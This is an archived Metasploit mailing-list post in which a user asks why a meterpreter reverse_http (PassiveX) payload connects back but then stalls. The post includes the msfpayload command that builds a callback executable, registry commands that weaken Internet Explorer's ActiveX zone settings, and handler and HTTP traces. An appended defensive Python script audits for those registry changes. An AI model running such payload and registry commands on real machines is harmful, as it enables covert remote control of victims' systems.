Metasploit mailing list archives
meterpreter/reverse_http not working?
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 9 Jan 2011 13:09:07 +0300
I don't know if it's me, or something is actually wrong with the payload. After doing it "by the book", it downloads the dll, registry keys are modified, and it connects back to the PXHOST, ..... then nothing...

root@bt:~# msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.5 PXPORT=80 PXURI=/update X > px.exe && ...start multi/handler...

"Nothing" means: if I browsed manually to http://192.168.0.5/update , I get a white page "that has the <object> tag in it", and IE6 is done, sitting idle. Also, if I run the px.exe, I'll end up with the invisible IEXPLORE.exe running in the process list, simply doing nothing.

If someone doesn't feel like reading my LONG post, the bottom line is: I got no errors, no warnings, and I believe everything is properly prepared for the payload to do its magic ...

If anyone has time to confirm/point me to my mistake, it would be highly appreciated.

Thanks in advance.
Sherif.

BEGINNING OF VERBOSE INFORMATION
================================
I tried on two different physical machines, and a VM, all with the same config "more or less":

Client: XP SP3 IE6, no AV, no Firewall

Checklist:
%windir%\Downloaded Program Files\passivex.dll ---> true
reg ADD "..\..\\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.0.5"
reg ADD "..\..\\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1
reg ADD "..\..\\Zones\1" /v "1001" /t REG_DWORD /d 0
reg ADD "..\..\\Zones\1" /v "1004" /t REG_DWORD /d 0
reg ADD "..\..\\Zones\1" /v "1200" /t REG_DWORD /d 0
reg ADD "..\..\\Zones\1" /v "1201" /t REG_DWORD /d 0
reg ADD "..\..\\Zones\1" /v "1208" /t REG_DWORD /d 0
===============================
msf exploit(handler) > show options

Payload options (windows/meterpreter/reverse_http):

   Name       Current Setting                       Required  Description
   ----       ---------------                       --------  -----------
   EXITFUNC   process                               yes       Exit technique: seh, thread, none, process
   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838  yes       ActiveX CLSID
   PXAXVER    -1,-1,-1,-1                           yes       ActiveX DLL Version
   PXHOST     192.168.0.5                           yes       The local HTTP listener hostname
   PXPORT     80                                    yes       The local HTTP listener port
   PXURI      /update                               no        The URI root for requests

msf exploit(handler) >
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Sending PassiveX DLL (125952 bytes)
[*] Sending PassiveX main page to client
[*] Sending PassiveX DLL (125952 bytes)
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
...
...

The many "Sending PassiveX main page to client" are actually me trying to refresh the page, double clicking the px.exe .... to see what's happening..
===============================
FollowTcpStream

GET /update HTTP/1.1
<---SNIP--->
HTTP/1.1 200 OK
<---SNIP--->
<html>
<object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" codebase="/update/passivex.dll#-1,-1,-1,-1">
<param name="HttpHost" value="192.168.0.5">
<param name="HttpPort" value="80">
<param name="HttpUriBase" value="/update">
<param name="HttpSid" value="1">
<param name="DownloadSecondStage" value="1">
</object>
<---SNIP--->
GET /update/passivex.dll HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 125952
Server: Rex
Connection: Keep-Alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
<---SNIP--->

DLL downloaded, page refreshed, and then nothing...
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
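
A defensive check for the registry state listed in the post's checklist, as an added example that is not part of the original message: it parses `reg query ... /s` text and reports ActiveX URL actions set to 0 in a zone, plus address ranges pinned to a zone. The full key path in the sample is an assumption (the post elides it); the sample output and the key name `Range1` are constructed.

```python
import re

# URL actions from the post's checklist; data 0 means "enable without prompt".
ACTIVEX_ACTIONS = {
    "1001": "download signed ActiveX controls",
    "1004": "download unsigned ActiveX controls",
    "1200": "run ActiveX controls and plug-ins",
    "1201": "script ActiveX controls not marked safe for scripting",
    "1208": "run previously unused ActiveX controls without prompt",
}
ZONE_KEY = re.compile(r"\\Zones\\(\d)$", re.I)
RANGE_KEY = re.compile(r"\\ZoneMap\\Ranges\\[^\\]+$", re.I)
# Constructed sample of `reg query <key> /s` output (key path is an assumption).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\Range1
    :Range    REG_SZ    192.168.0.5
    *    REG_DWORD    0x1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
    1001    REG_DWORD    0x0
    1004    REG_DWORD    0x0
    1200    REG_DWORD    0x0
    1201    REG_DWORD    0x3
    1208    REG_DWORD    0x0
"""

def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from reg query text."""
    keys, current = {}, None
    for line in filter(str.strip, text.splitlines()):   # skip blank lines
        if not line[0].isspace():            # unindented line is a key path
            current = keys.setdefault(line.strip(), {})
        elif current is not None:            # indented line: name, type, data
            parts = re.split(r"\t+| {2,}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                current[parts[0]] = (parts[1], parts[2])
    return keys

def audit(text):
    """Flag ActiveX actions set to 0 and address ranges pinned to a zone."""
    findings = []
    for key, values in parse_reg_query(text).items():
        zone = ZONE_KEY.search(key)
        for name, desc in ACTIVEX_ACTIONS.items() if zone else ():
            if values.get(name) == ("REG_DWORD", "0x0"):  # reg.exe prints hex
                findings.append(("activex-enabled", zone.group(1), name, desc))
        if RANGE_KEY.search(key) and ":Range" in values:
            findings += [("range-mapped", values[":Range"][1], p, int(d, 16))
                         for p, (k, d) in values.items() if k == "REG_DWORD"]
    return findings
```

On the constructed sample, `audit(SAMPLE)` reports the range 192.168.0.5 mapped to zone 1 for all protocols and four of the five actions enabled; 1201 is skipped because its data is 0x3 (disabled).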